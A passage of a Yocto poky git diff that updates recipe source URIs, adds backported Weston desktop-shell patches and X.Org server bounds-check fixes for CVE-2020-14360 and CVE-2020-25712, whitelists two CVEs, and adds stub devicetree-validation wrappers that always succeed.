"http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz" -SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7" -SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7" +SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2" +SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942" +SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb" -UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html" +S = "${WORKDIR}/${BPN}-v${PV}" + +UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases" inherit meson features_check lib_package bash-completion diff --git a/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch new file mode 100644 index 0000000000..fb36d3817a --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch @@ -0,0 +1,32 @@ +From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001 +From: Marius Vlad <marius.vlad@collabora.com> +Date: Fri, 5 Mar 2021 20:03:49 +0200 +Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg + top-level surface + +The shsurf is calloc'ed so the surface count is always 0. Not only +that but the surface is not set as active by default, so there's no +need to de-activate it. + +Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f] +Signed-off-by: Marius Vlad <marius.vlad@collabora.com> +--- + desktop-shell/shell.c | 2 -- + 1 file changed, 2 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index 442a625f..3791be25 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface, + wl_list_init(&shsurf->children_link); + + weston_desktop_surface_set_user_data(desktop_surface, shsurf); +- weston_desktop_surface_set_activated(desktop_surface, +- shsurf->focus_count > 0); + } + + static void +-- +2.34.1 + diff --git a/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch new file mode 100644 index 0000000000..dcd0700fca --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch @@ -0,0 +1,57 @@ +From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001 +From: Marius Vlad <marius.vlad@collabora.com> +Date: Fri, 5 Mar 2021 21:40:22 +0200 +Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to + activate/de-activate + +This way it better reflects that it handles activation rather that input +focus. + +Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208] +Signed-off-by: Marius Vlad <marius.vlad@collabora.com> +--- + desktop-shell/shell.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index 3791be25..c4669f11 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data) + } + + static void +-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf) ++shell_surface_deactivate(struct shell_surface *shsurf) + { + if (--shsurf->focus_count == 0) + weston_desktop_surface_set_activated(shsurf->desktop_surface, false); + } + + static void +-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf) ++shell_surface_activate(struct shell_surface *shsurf) + { + if (shsurf->focus_count++ == 0) + weston_desktop_surface_set_activated(shsurf->desktop_surface, true); +@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data) + if (seat->focused_surface) { + struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); + if (shsurf) +- shell_surface_lose_keyboard_focus(shsurf); ++ shell_surface_deactivate(shsurf); + } + + seat->focused_surface = weston_surface_get_main_surface(keyboard->focus); +@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data) + if (seat->focused_surface) { + struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); + if (shsurf) +- shell_surface_gain_keyboard_focus(shsurf); ++ shell_surface_activate(shsurf); + } + } + +-- +2.34.1 + diff --git a/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch new file mode 100644 index 0000000000..7ca72f8494 --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch @@ -0,0 +1,99 @@ +From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001 +From: Marius Vlad <marius.vlad@collabora.com> +Date: Fri, 5 Mar 2021 21:44:26 +0200 +Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when + activating + +We shouldn't be constrained by having a keyboard plugged-in, so avoid +activating/de-activating the window/surface in the keyboard focus +handler and embed it straight into the window activation part. + +Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69] +Signed-off-by: Marius Vlad <marius.vlad@collabora.com> +--- + desktop-shell/shell.c | 41 +++++++++++++++++++++++++---------------- + 1 file changed, 25 insertions(+), 16 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index c4669f11..c6a4fe91 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf) + static void + handle_keyboard_focus(struct wl_listener *listener, void *data) + { +- struct weston_keyboard *keyboard = data; +- struct shell_seat *seat = get_shell_seat(keyboard->seat); +- +- if (seat->focused_surface) { +- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); +- if (shsurf) +- shell_surface_deactivate(shsurf); +- } +- +- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus); +- +- if (seat->focused_surface) { +- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); +- if (shsurf) +- shell_surface_activate(shsurf); +- } ++ /* FIXME: To be removed later. */ + } + + /* The surface will be inserted into the list immediately after the link +@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface, + struct shell_surface *shsurf_child, *tmp; + struct weston_surface *surface = + weston_desktop_surface_get_surface(desktop_surface); ++ struct weston_seat *seat; + + if (!shsurf) + return; +@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface, + } + wl_list_remove(&shsurf->children_link); + ++ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) { ++ struct shell_seat *shseat = get_shell_seat(seat); ++ /* activate() controls the focused surface activation and ++ * removal of a surface requires invalidating the ++ * focused_surface to avoid activate() use a stale (and just ++ * removed) surface when attempting to de-activate it. It will ++ * also update the focused_surface once it has a chance to run. ++ */ ++ if (surface == shseat->focused_surface) ++ shseat->focused_surface = NULL; ++ } ++ + wl_signal_emit(&shsurf->destroy_signal, shsurf); + + if (shsurf->fullscreen.black_view) +@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view, + struct workspace *ws; + struct weston_surface *old_es; + struct shell_surface *shsurf, *shsurf_child; ++ struct shell_seat *shseat = get_shell_seat(seat); + + main_surface = weston_surface_get_main_surface(es); + shsurf = get_shell_surface(main_surface); +@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view, + + weston_view_activate(view, seat, flags); + ++ if (shseat->focused_surface) { ++ struct shell_surface *current_focus = ++ get_shell_surface(shseat->focused_surface); ++ assert(current_focus); ++ shell_surface_deactivate(current_focus); ++ } ++ ++ shseat->focused_surface = main_surface; ++ shell_surface_activate(shsurf); ++ + state = ensure_focus_state(shell, seat); + if (state == NULL) + return; +-- +2.34.1 + diff --git a/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb b/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb index 0b383f25f3..5e4e2032c9 100644 --- a/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb +++ b/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb @@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \ file://weston.desktop \ file://xwayland.weston-start \ file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \ + file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \ + file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \ + file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \ " SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3" SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848" diff --git a/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb index d2a16643fe..e524b82dd6 100644 --- a/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb +++ b/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb @@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check REQUIRED_DISTRO_FEATURES = "x11" SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46" -SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \ +SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \ file://30xinput_calibrate.sh \ file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \ file://0001-calibrator.hh-Include-string-to-get-std-string.patch \ diff --git a/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb index 553840ddb8..685362ef15 100644 --- a/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb +++ b/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb @@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf" PV = "2.99.917+git${SRCPV}" S = "${WORKDIR}/git" -SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel" +SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)" diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc index b4f0760176..c891211c40 100644 --- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc @@ -18,7 +18,15 @@ INC_PR = "r8" XORG_PN = "xorg-server" SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2" -CVE_PRODUCT = "xorg-server" +CVE_PRODUCT = "xorg-server x_server" +# This is specific to Debian's xserver-wrapper.c +CVE_CHECK_WHITELIST += "CVE-2011-4613" +# As per upstream, exploiting this flaw is non-trivial and it requires exact +# timing on the behalf of the attacker. Many graphical applications exit if their +# connection to the X server is lost, so a typical desktop session is either +# impossible or difficult to exploit. There is currently no upstream patch +# available for this flaw. +CVE_CHECK_WHITELIST += "CVE-2020-25697" S = "${WORKDIR}/${XORG_PN}-${PV}" diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch new file mode 100644 index 0000000000..e9ab42742e --- /dev/null +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch @@ -0,0 +1,132 @@ +From 446ff2d3177087b8173fa779fa5b77a2a128988b Mon Sep 17 00:00:00 2001 +From: Matthieu Herrb <matthieu@herrb.eu> +Date: Thu, 12 Nov 2020 19:15:07 +0100 +Subject: [PATCH] Check SetMap request length carefully. + +Avoid out of bounds memory accesses on too short request. + +ZDI-CAN 11572 / CVE-2020-14360 + +This vulnerability was discovered by: +Jan-Niklas Sohn working with Trend Micro Zero Day Initiative + +Signed-off-by: Matthieu Herrb <matthieu@herrb.eu> + +Upstream-Status: Backport +https://gitlab.freedesktop.org/xorg/xserver/-/commit/446ff2d3177087b8173fa779fa5b77a2a128988b +CVE: CVE-2020-14360 +Signed-off-by: Armin Kuster <akuster@mvista.com> +--- + xkb/xkb.c | 92 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ + 1 file changed, 92 insertions(+) + +Index: xorg-server-1.20.8/xkb/xkb.c +=================================================================== +--- xorg-server-1.20.8.orig/xkb/xkb.c ++++ xorg-server-1.20.8/xkb/xkb.c +@@ -2382,6 +2382,93 @@ SetVirtualModMap(XkbSrvInfoPtr xkbi, + return (char *) wire; + } + ++#define _add_check_len(new) \ ++ if (len > UINT32_MAX - (new) || len > req_len - (new)) goto bad; \ ++ else len += new ++ ++/** ++ * Check the length of the SetMap request ++ */ ++static int ++_XkbSetMapCheckLength(xkbSetMapReq *req) ++{ ++ size_t len = sz_xkbSetMapReq, req_len = req->length << 2; ++ xkbKeyTypeWireDesc *keytype; ++ xkbSymMapWireDesc *symmap; ++ BOOL preserve; ++ int i, map_count, nSyms; ++ ++ if (req_len < len) ++ goto bad; ++ /* types */ ++ if (req->present & XkbKeyTypesMask) { ++ keytype = (xkbKeyTypeWireDesc *)(req + 1); ++ for (i = 0; i < req->nTypes; i++) { ++ _add_check_len(XkbPaddedSize(sz_xkbKeyTypeWireDesc)); ++ if (req->flags & XkbSetMapResizeTypes) { ++ _add_check_len(keytype->nMapEntries ++ * sz_xkbKTSetMapEntryWireDesc); ++ preserve = keytype->preserve; ++ map_count = keytype->nMapEntries; ++ if (preserve) { ++ _add_check_len(map_count * sz_xkbModsWireDesc); ++ } ++ keytype += 1; ++ keytype = (xkbKeyTypeWireDesc *) ++ ((xkbKTSetMapEntryWireDesc *)keytype + map_count); ++ if (preserve) ++ keytype = (xkbKeyTypeWireDesc *) ++ ((xkbModsWireDesc *)keytype + map_count); ++ } ++ } ++ } ++ /* syms */ ++ if (req->present & XkbKeySymsMask) { ++ symmap = (xkbSymMapWireDesc *)((char *)req + len); ++ for (i = 0; i < req->nKeySyms; i++) { ++ _add_check_len(sz_xkbSymMapWireDesc); ++ nSyms = symmap->nSyms; ++ _add_check_len(nSyms*sizeof(CARD32)); ++ symmap += 1; ++ symmap = (xkbSymMapWireDesc *)((CARD32 *)symmap + nSyms); ++ } ++ } ++ /* actions */ ++ if (req->present & XkbKeyActionsMask) { ++ _add_check_len(req->totalActs * sz_xkbActionWireDesc ++ + XkbPaddedSize(req->nKeyActs)); ++ } ++ /* behaviours */ ++ if (req->present & XkbKeyBehaviorsMask) { ++ _add_check_len(req->totalKeyBehaviors * sz_xkbBehaviorWireDesc); ++ } ++ /* vmods */ ++ if (req->present & XkbVirtualModsMask) { ++ _add_check_len(XkbPaddedSize(Ones(req->virtualMods))); ++ } ++ /* explicit */ ++ if (req->present & XkbExplicitComponentsMask) { ++ /* two bytes per non-zero explicit componen */ ++ _add_check_len(XkbPaddedSize(req->totalKeyExplicit * sizeof(CARD16))); ++ } ++ /* modmap */ ++ if (req->present & XkbModifierMapMask) { ++ /* two bytes per non-zero modmap component */ ++ _add_check_len(XkbPaddedSize(req->totalModMapKeys * sizeof(CARD16))); ++ } ++ /* vmodmap */ ++ if (req->present & XkbVirtualModMapMask) { ++ _add_check_len(req->totalVModMapKeys * sz_xkbVModMapWireDesc); ++ } ++ if (len == req_len) ++ return Success; ++bad: ++ ErrorF("[xkb] BOGUS LENGTH in SetMap: expected %ld got %ld\n", ++ len, req_len); ++ return BadLength; ++} ++ ++ + /** + * Check if the given request can be applied to the given device but don't + * actually do anything.. +@@ -2639,6 +2726,11 @@ ProcXkbSetMap(ClientPtr client) + CHK_KBD_DEVICE(dev, stuff->deviceSpec, client, DixManageAccess); + CHK_MASK_LEGAL(0x01, stuff->present, XkbAllMapComponentsMask); + ++ /* first verify the request length carefully */ ++ rc = _XkbSetMapCheckLength(stuff); ++ if (rc != Success) ++ return rc; ++ + tmp = (char *) &stuff[1]; + + /* Check if we can to the SetMap on the requested device. If this diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch new file mode 100644 index 0000000000..f39f6b32b1 --- /dev/null +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch @@ -0,0 +1,102 @@ +From 87c64fc5b0db9f62f4e361444f4b60501ebf67b9 Mon Sep 17 00:00:00 2001 +From: Matthieu Herrb <matthieu@herrb.eu> +Date: Sun, 11 Oct 2020 17:05:09 +0200 +Subject: [PATCH] Fix XkbSetDeviceInfo() and SetDeviceIndicators() heap + overflows + +ZDI-CAN 11389 / CVE-2020-25712 + +This vulnerability was discovered by: +Jan-Niklas Sohn working with Trend Micro Zero Day Initiative + +Signed-off-by: Matthieu Herrb <matthieu@herrb.eu> + +Upstream-Status: Backport +https://gitlab.freedesktop.org/xorg/xserver/-/commit/87c64fc5b0db9f62f4e361444f4b60501ebf67b9 +CVE: CVE-2020-25712 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + xkb/xkb.c | 26 +++++++++++++++++++++++--- + 1 file changed, 23 insertions(+), 3 deletions(-) + +Index: xorg-server-1.20.8/xkb/xkb.c +=================================================================== +--- xorg-server-1.20.8.orig/xkb/xkb.c ++++ xorg-server-1.20.8/xkb/xkb.c +@@ -6625,7 +6625,9 @@ SetDeviceIndicators(char *wire, + unsigned changed, + int num, + int *status_rtrn, +- ClientPtr client, xkbExtensionDeviceNotify * ev) ++ ClientPtr client, ++ xkbExtensionDeviceNotify * ev, ++ xkbSetDeviceInfoReq * stuff) + { + xkbDeviceLedsWireDesc *ledWire; + int i; +@@ -6646,6 +6648,11 @@ SetDeviceIndicators(char *wire, + xkbIndicatorMapWireDesc *mapWire; + XkbSrvLedInfoPtr sli; + ++ if (!_XkbCheckRequestBounds(client, stuff, ledWire, ledWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) ledWire; ++ } ++ + namec = mapc = statec = 0; + sli = XkbFindSrvLedInfo(dev, ledWire->ledClass, ledWire->ledID, + XkbXI_IndicatorMapsMask); +@@ -6664,6 +6671,10 @@ SetDeviceIndicators(char *wire, + memset((char *) sli->names, 0, XkbNumIndicators * sizeof(Atom)); + for (n = 0, bit = 1; n < XkbNumIndicators; n++, bit <<= 1) { + if (ledWire->namesPresent & bit) { ++ if (!_XkbCheckRequestBounds(client, stuff, atomWire, atomWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) atomWire; ++ } + sli->names[n] = (Atom) *atomWire; + if (sli->names[n] == None) + ledWire->namesPresent &= ~bit; +@@ -6681,6 +6692,10 @@ SetDeviceIndicators(char *wire, + if (ledWire->mapsPresent) { + for (n = 0, bit = 1; n < XkbNumIndicators; n++, bit <<= 1) { + if (ledWire->mapsPresent & bit) { ++ if (!_XkbCheckRequestBounds(client, stuff, mapWire, mapWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) mapWire; ++ } + sli->maps[n].flags = mapWire->flags; + sli->maps[n].which_groups = mapWire->whichGroups; + sli->maps[n].groups = mapWire->groups; +@@ -6760,7 +6775,7 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + ed.deviceID = dev->id; + wire = (char *) &stuff[1]; + if (stuff->change & XkbXI_ButtonActionsMask) { +- int nBtns, sz, i; ++ int nBtns, sz, i; + XkbAction *acts; + DeviceIntPtr kbd; + +@@ -6772,7 +6787,11 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + return BadAlloc; + dev->button->xkb_acts = acts; + } ++ if (stuff->firstBtn + stuff->nBtns > nBtns) ++ return BadValue; + sz = stuff->nBtns * SIZEOF(xkbActionWireDesc); ++ if (!_XkbCheckRequestBounds(client, stuff, wire, (char *) wire + sz)) ++ return BadLength; + memcpy((char *) &acts[stuff->firstBtn], (char *) wire, sz); + wire += sz; + ed.reason |= XkbXI_ButtonActionsMask; +@@ -6793,7 +6812,8 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + int status = Success; + + wire = SetDeviceIndicators(wire, dev, stuff->change, +- stuff->nDeviceLedFBs, &status, client, &ed); ++ stuff->nDeviceLedFBs, &status, client, &ed, ++ stuff); + if (status != Success) + return status; + } diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb index 2af1b6f307..8c77c3756b 100644 --- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb @@ -10,6 +10,8 @@ SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.pat file://CVE-2020-14361.patch \ file://CVE-2020-14362.patch \ file://CVE-2020-14345.patch \ + file://CVE-2020-14360.patch \ + file://CVE-2020-25712.patch \ " SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839" SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146" diff --git a/poky/meta/recipes-kernel/blktrace/blktrace_git.bb b/poky/meta/recipes-kernel/blktrace/blktrace_git.bb index 7ccc022b93..2110bc75fa 100644 --- a/poky/meta/recipes-kernel/blktrace/blktrace_git.bb +++ b/poky/meta/recipes-kernel/blktrace/blktrace_git.bb @@ -14,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e" PV = "1.2.0+git${SRCPV}" -SRC_URI = "git://git.kernel.dk/blktrace.git \ +SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \ file://ldflags.patch \ file://CVE-2018-10689.patch \ file://make-btt-scripts-python3-ready.patch \ diff --git a/poky/meta/recipes-kernel/cryptodev/cryptodev.inc b/poky/meta/recipes-kernel/cryptodev/cryptodev.inc index cf9b9b7207..f02619cabe 100644 --- a/poky/meta/recipes-kernel/cryptodev/cryptodev.inc +++ b/poky/meta/recipes-kernel/cryptodev/cryptodev.inc @@ -8,7 +8,7 @@ API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)." LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \ +SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \ " SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b" diff --git a/poky/meta/recipes-kernel/dtc/dtc.inc b/poky/meta/recipes-kernel/dtc/dtc.inc index 5da6c24fbf..461ab8fbd3 100644 --- a/poky/meta/recipes-kernel/dtc/dtc.inc +++ b/poky/meta/recipes-kernel/dtc/dtc.inc @@ -5,7 +5,7 @@ SECTION = "bootloader" LICENSE = "GPLv2 | BSD" DEPENDS = "flex-native bison-native" -SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \ file://make_install.patch \ file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \ " diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate new file mode 100644 index 0000000000..2aa57851c7 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-doc-validate wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com> +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-doc-validate.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema new file mode 100644 index 0000000000..24b89d8619 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-mk-schema wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com> +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-mk-schema.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate new file mode 100644 index 0000000000..8a4710a7ed --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-validate wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com> +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-validate.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb new file mode 100644 index 0000000000..c869274d09 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb @@ -0,0 +1,17 @@ +DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema" +HOMEPAGE = "https://yoctoproject.org" +LICENSE = "MIT" +LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420" + +SRC_URI = "file://dt-doc-validate \ + file://dt-mk-schema \ + file://dt-validate" + +do_install() { + install -d ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/ +} + +BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb index 3f76af424b..82d678e509 100644 --- a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb +++ b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb @@ -14,7 +14,7 @@ PV = "0.2+git${SRCPV}" inherit native -SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git" +SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master" S = "${WORKDIR}/git" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-kernel/kmod/kmod.inc b/poky/meta/recipes-kernel/kmod/kmod.inc index bb678c6900..631b50658a 100644 --- a/poky/meta/recipes-kernel/kmod/kmod.inc +++ b/poky/meta/recipes-kernel/kmod/kmod.inc @@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f" # Lookout for PV bump too when SRCREV is changed PV = "26" -SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \ file://depmod-search.conf \ file://0001-build-Stop-using-dolt.patch \ file://avoid_parallel_tests.patch \ diff --git a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb index 513932984e..92b6ff5157 100644 --- a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb +++ b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20211216.bb @@ -97,7 +97,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \ file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \ - file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \ + file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \ file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \ file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \ file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \ @@ -132,7 +132,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ 